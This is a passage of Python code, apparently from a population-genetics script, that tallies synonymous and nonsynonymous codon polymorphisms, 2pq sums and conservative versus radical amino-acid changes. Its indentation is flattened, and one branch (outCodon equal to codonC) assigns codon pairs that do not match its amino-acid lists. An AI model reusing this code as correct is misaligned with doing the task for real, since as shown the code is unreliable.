for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
if i == 0 and codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
currAADict[codon] = aa
if aa not in aaList:
aaList.append(aa)
if totalChanges == 1:
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
twoPQ *= freq
if len(aaList) == 1:
sex_synS += 1
sex_sum2PQ_S += twoPQ
else:
sex_nsynS += 1
sex_sum2PQ_N += twoPQ
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ
elif totalChanges == 2:
if len(currAlleleDict) == 3:
ab = 0
ac = 0
bc = 0
codonA = currAlleleList[0]
codonB = currAlleleList[1]
codonC = currAlleleList[2]
if codonA[0] != codonB[0]:
ab += 1
if codonA[1] != codonB[1]:
ab += 1
if codonA[2] != codonB[2]:
ab += 1
if codonA[0] != codonC[0]:
ac += 1
if codonA[1] != codonC[1]:
ac += 1
if codonA[2] != codonC[2]:
ac += 1
if codonC[0] != codonB[0]:
bc += 1
if codonC[1] != codonB[1]:
bc += 1
if codonC[2] != codonB[2]:
bc += 1
if ab == ac and ac == bc:
if 'N' not in outCodon and '-' not in outCodon:
if outCodon == codonA:
aaList1 = [currAADict[codonA],currAADict[codonB]]
aaList2 = [currAADict[codonA],currAADict[codonC]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
elif outCodon == codonB:
aaList1 = [currAADict[codonB],currAADict[codonA]]
aaList2 = [currAADict[codonB],currAADict[codonC]]
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
elif outCodon == codonC:
aaList1 = [currAADict[codonC],currAADict[codonA]]
aaList2 = [currAADict[codonC],currAADict[codonB]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
else:
if ab > ac and ab > bc:
codonList1 = [codonC,codonB]
codonList2 = [codonC,codonA]
elif ac > ab and ac > bc:
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
elif bc > ab and bc > ac:
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
aaList1 = []
aaList2 = []
for comp in codonList1:
if i < 3:
if comp in startCodons:
aaList1.append('M')
else:
aaList1.append(geneticCode[comp])
else:
aaList1.append(geneticCode[comp])
for comp in codonList2:
if i < 3:
if comp in startCodons:
aaList2.append('M')
else:
aaList2.append(geneticCode[comp])
else:
aaList2.append(geneticCode[comp])
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
elif len(currAlleleDict) == 2:
currFreqDict = {}
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
twoPQ *= freq
currFreqDict[codon] = freq
if len(aaList) == 1:
sex_synS += 2
sex_sum2PQ_S += (2*twoPQ)
i += 1
asex_sum2PQ_S = 0
asex_sum2PQ_N = 0
asex_sum2PQ_C1 = 0
asex_sum2PQ_C2 = 0
